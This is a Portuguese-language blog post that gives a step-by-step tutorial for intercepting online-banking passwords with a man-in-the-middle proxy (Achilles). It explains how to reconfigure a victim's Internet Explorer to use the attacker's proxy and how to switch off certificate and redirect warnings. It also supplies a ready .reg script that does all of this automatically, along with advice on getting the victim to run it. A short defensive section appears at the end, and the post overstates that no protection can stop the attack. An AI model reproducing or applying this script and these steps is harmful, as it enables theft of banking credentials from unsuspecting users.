quarta-feira, 12 de setembro de 2012

A técnica Man-in-the-Middle

 O que aconteceu, se eu tomei todos os cuidados antes de entrar com a minha senha!? ...
Onde estava o erro afinal?
Será que havia um HOMEM-NO-MEIO?

A Técnica

Apesar de ser uma técnica relativamente fácil de ser feita, não deixa de ser uma técnica super poderosa. Muitos crackers à usam para fins maléficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentássemos captura-las por técnicas de sniffing não obteríamos nada legível. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais são facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteção existente nos dias de hoje é capaz de parar esta técnica.
Espero que nenhum de nossos leitores use o conhecimento aqui obtido para causar prejuízos a terceiros, uma vez que escrevi este artigo apenas para fins didáticos e não poderá ser usado como forma de incentivo a criminalidade. O que garante que eu possa passar este conhecimento para você sem está cometendo um crime é o artigo 5º da Constituição Federal que nos garante a Liberdade de Expressão.


Como funciona?

Veja a imagem a seguir, esta é uma representação de uma conexão normal, sem interceptações, e funciona de modo que o cliente passa os dados criptografados para o servidor e vice-versa, tornando assim impossível o uso de técnicas de sniffing para a capturados dados trocados entre o cliente e o servidor.


Abaixo segue uma representação de uma conexão interceptada, (usando a técnica Man-in-The-Middle), e funciona de modo que o hacker engana o cliente e o servidor. Engana o cliente se fazendo passar por um simples servidor de proxy, e engana o servidor se passando pelo próprio cliente, desta forma os dados chegam até o hacker em texto puro, pois os dois pensam que o hacker é uma fonte confiável.



Conhecendo o Anchiles

O Achiles nada mais é do que um simples servidor de proxy, que se usado de forma incorreta pode servir como uma poderosa ferramenta hacker, que nas mão de uma pessoa mal intencionada pode causar grandes prejuízos, uma verdadeira faca de dois gumes. Você pode usar outro programa semelhante mais vamos usar este no exemplo.

Configurando



Em seguida clique no botão com um sinal de play no achiles para iniciar o servidor de proxy, para confirmar se o Achiles realmente iniciou o servidor verifique na barra de status do programa se ele está como running como na figura abaixo.


Agora abra as janelas do cliente e do servidor, para abrir a janela do cliente basta clicar no botão do ícone C e para a abrir a janela do servidor basta clicar na janela com o ícone S e aogra o Achiles já está configurado vamos agora configurar a máquina alvo.

Preparando o computador alvo

Um dos grandes inconvenientes desta técnica é que precisamos ter acesso físico à máquina do alvo para fazermos algumas configurações para que a técnica dê certo ou então poderíamos escrever um controle ActiveX que quando o alvo entrasse em uma página contendo este controle malicioso feito pelo hacker, estas alterações fossem feitas no computador do alvo automaticamente, mas isto é uma área muito avançada e será estudada em um outro artigo, talvez.
Para preparar o computador do alvo siga os passos:

Etapa 1
Abra o Internet Explorer do alvo, clique no menu Ferramentas / Opções de Internet... E em seguida na aba Conexões e depois em Configurações da LAN.

Etapa 2
Tomando como exemplo a figura abaixo, na máquina do alvo marque a opção de número 01 e em seguida digite o seu IP no campo número 02 (você pode ver qual é o seu IP acessando http://www.ip-adress.com) e no campo de número 03 digite a porta que você especificou no achiles quando o configurava. Agora clique em OK e vá para a aba Avançadas.


Etapa 3

Na aba Avançadas role a drop-down até encontrar as opções no grupo Segurança:
Avisar quando o certificado do site for inválido
Avisar se os formulários submentidos estiverem sendo redirecionados
Pronto! Agora é só esperar que o alvo acesse site e digite seus dados (login e senha), e logo aparecerá na janela de Cliente do Achiles. Na janela do servidor você poderá ver as respostas que o servidor está dando para o cliente, use com cuidado!

Script automatizado

Vamos escrever um script que fará todo o trabalho pesado pra você, ele fará toda a configuração mostrada acima, automaticamente basta apenas executá-lo e pronto o computador da vítima já está preparado para a ser interceptado.
Abra o notepad e digite o seguinte código, (sem a numeração das linhas):

Windows Registry Editor Version 6.01
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable"=dword:00000001
"ProxyServer"="127.0.0.1:8080"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnonBadCertRecving"=dword:00000000
"WarnOnPostRedirect"=dword:00000000

Em seguida salve o arquivo com a extensão .reg.

Como configurar o script

Para configurar este script é bastante simples basta você editar a linha de número 4 ("ProxyServer"="127.0.0.1:8080") no código do script colocando lá informações sobre o IP e porta do servidor de proxy que no caso é o IP do seu computador. No lugar de 127.0.0.1 você deverá digitar o seu IP e no lugar de 8080 você deverá digitar a porta pela qual o servidor do proxy vai se comunicar com o cliente, ficando assim "ProxyServer"="ip.do.seu.micro:porta".
O script está pronto! Agora é só você fazer com que o alvo o abra ou em um rápido acesso físico a máquina do mesmo você poderá executá-lo já que sua execução é bastante rápida.

Proteja-se

Se você perceber a internet extremamente lenta ou se for emitido algum aviso sobre o certificado de segurança inválido, quando você acessar alguma página segura como a página de um banco, desconfie! Pois você pode estar sendo mais uma vítima desta poderosa técnica. Crie o habito de checar as configurações de proxy (Ferramentas>Opções de Internet...) toda vez que for visitar sites de bancos ou passar informações sigilosas via internet, assim você ficará bem mais protegido.
Pode existir novas técnicas que aplicam o golpe Man-in-the-Maddle e softwares especificos para o feito, então sempre se mantenha atualizado sobre isto.

FONTE : securityhacker

Nota:

2 comentários:

Proibido palavras ofensivas, racistas ou descriminatórias.

[Seu Comentário será liberado no máximo em 24horas]